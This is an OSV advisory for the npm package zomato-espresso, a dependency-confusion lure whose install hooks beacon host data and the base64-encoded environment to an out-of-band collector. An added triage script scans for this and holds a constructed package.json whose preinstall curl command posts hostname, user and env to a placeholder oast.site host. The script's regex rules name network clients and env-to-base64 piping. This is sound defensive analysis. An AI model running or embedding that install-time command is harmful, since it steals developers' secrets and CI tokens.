MAL-2026-6269

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-espresso/MAL-2026-6269.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6269
Published
2026-06-22T17:42:29Z
Modified
2026-06-22T18:31:22.528932473Z
Summary
Malicious code in zomato-espresso (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d)

Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm install, posting the installer's fully qualified hostname (hostname -f), username (whoami), current working directory, and the entire process environment (base64-encoded via env | base64 -w0) over plain HTTP to an interactsh out-of-band collector at d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site. The URL path embeds the package name and the form fields exfiltrate host, user, cwd, and env, so any CI or developer environment that misresolves Zomato's internal package name to this public release leaks AWS keys, GITHUB_TOKEN, NPM_TOKEN, and any other secret present in the environment. A preuninstall hook performs a similar host beacon. The package's own functionality is a stub (index.js exports only {name, version}); its sole purpose is the install-time beacon. The description string self-identifies as Zomato's PDF generator service, confirming the dependency-confusion reconnaissance intent against Zomato's private namespace.
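The two checks a reviewer would run on a suspect tarball like this one, written out as an added example (this is editor-supplied triage code, not part of the OSV record, the ossf/malicious-packages entry, or the zomato-espresso package): first, scan the package.json lifecycle hooks (preinstall, preuninstall and the rest) for the beacon pattern the advisory describes, namely a network client posting host reconnaissance and a base64-encoded environment to an interactsh-style OAST collector over cleartext HTTP; second, compare the downloaded tarball's bytes against the sha512 SRI string published under package_integrity. The regex rules are the editor's heuristics, not an official ruleset, and the sample manifest is constructed to mirror the advisory text with a placeholder collector hostname rather than the real one.

```python
"""Install-time beacon triage for an npm package (added example, not from the advisory).

Checks:
  1. scan_lifecycle_scripts(): flag lifecycle hooks that call a network client,
     reference an out-of-band (OAST) collector domain, pipe the environment
     through base64, run host reconnaissance, or use cleartext http://.
  2. compute_sri() / matches_indicator(): hash tarball bytes into the
     "algo-base64" SRI form npm uses and compare with a published indicator.
The SAMPLE_MANIFEST below is CONSTRUCTED from the advisory text; the
collector hostname is a placeholder, not the real interactsh domain.
"""
import base64
import hashlib
import json
import re

# Hooks npm runs automatically around install/uninstall; each one is
# arbitrary shell on the developer's or CI runner's machine.
LIFECYCLE_HOOKS = (
    "preinstall", "install", "postinstall", "prepare",
    "preuninstall", "uninstall", "postuninstall",
)

# (label, pattern). Any single hit is worth a look; several hits on one hook
# is the exfiltration-beacon signature described in the advisory.
RULES = (
    ("network_client", re.compile(r"\b(?:curl|wget|nc|ncat|Invoke-WebRequest)\b")),
    ("oast_collector", re.compile(
        r"\b[a-z0-9]+\.(?:oast\.(?:site|fun|live|pro|me|online)"
        r"|interact\.sh|burpcollaborator\.net)\b")),
    ("env_exfil", re.compile(r"\b(?:env|printenv)\b[^|;&]*\|\s*base64")),
    ("host_recon", re.compile(r"\b(?:hostname|whoami|id|uname)\b")),
    ("cleartext_http", re.compile(r"\bhttp://")),
)


def scan_lifecycle_scripts(package_json_text):
    """Return (hook, label, script) findings for every suspicious lifecycle hook."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not isinstance(script, str):
            continue
        for label, pattern in RULES:
            if pattern.search(script):
                findings.append((hook, label, script))
    return findings


def compute_sri(data, algorithm="sha512"):
    """SRI string (e.g. 'sha512-<base64 digest>') for raw bytes; this is the
    same form as npm's package-lock.json 'integrity' field and the advisory's
    sha512_sri indicator."""
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def matches_indicator(data, published_sri):
    """True if the tarball bytes hash to the published integrity indicator."""
    algorithm = published_sri.split("-", 1)[0]
    return compute_sri(data, algorithm) == published_sri


# CONSTRUCTED manifest modelled on the advisory's description of the package.
SAMPLE_MANIFEST = json.dumps({
    "name": "zomato-espresso",
    "version": "1.0.0",
    "description": "PDF generator service (constructed placeholder text)",
    "main": "index.js",
    "scripts": {
        "preinstall": 'curl -s -X POST "http://abc123placeholder.oast.site/zomato-espresso" '
                      '-d "host=$(hostname -f)" -d "user=$(whoami)" -d "cwd=$(pwd)" '
                      '-d "env=$(env | base64 -w0)"',
        "preuninstall": 'curl -s "http://abc123placeholder.oast.site/zomato-espresso/'
                        'uninstall?host=$(hostname -f)"',
        "test": "echo ok",
    },
})

if __name__ == "__main__":
    for hook, label, script in scan_lifecycle_scripts(SAMPLE_MANIFEST):
        print(f"[{hook}] {label}: {script[:72]}...")
```

To use it against the real artifact, fetch the tarball with npm pack (or read it from the npm cache), pass its bytes together with the sha512_sri value from the indicators block to matches_indicator(), extract package.json and run scan_lifecycle_scripts() on it. Note that because the payload lives entirely in lifecycle scripts, npm install --ignore-scripts (or ignore-scripts=true in .npmrc) prevents it from executing, which is the quickest containment for CI runners while the offending name is blocked at the registry proxy.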

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d",
            "versions": [
                "1.0.0"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:42:29Z",
            "id": "IN-MAL-2026-007146",
            "import_time": "2026-06-22T18:25:28.677729129Z"
        }
    ]
}

Affected packages

npm / zomato-espresso

Package: npm / zomato-espresso
Affected ranges: none listed
Affected versions: 1.0.0 (the only release in the 1.* group)

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-espresso/MAL-2026-6269.json"
indicators
{
    "package_integrity": [
        {
            "filename": "zomato-espresso-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-BIRziNuUMjKSW0e44vroWYzIF+eT8Xyw5TGxF7saZY+8GTW1xe9l/XTGhVVoFGYm+fJCmLlCDlRnTs7YCDrCUQ==",
                "sha1": "3a20e29cf15bc9de0be4b3058bfe93637a079373"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "f497ff339e6710b89864370f98cf6dcefb324083a49d25dceeed6a90f19820be",
            "tlsh": "2c01c934b8b496333d8c0370be6600293c722f4f82352c504adb091d838f215267da33",
            "path": "package.json"
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]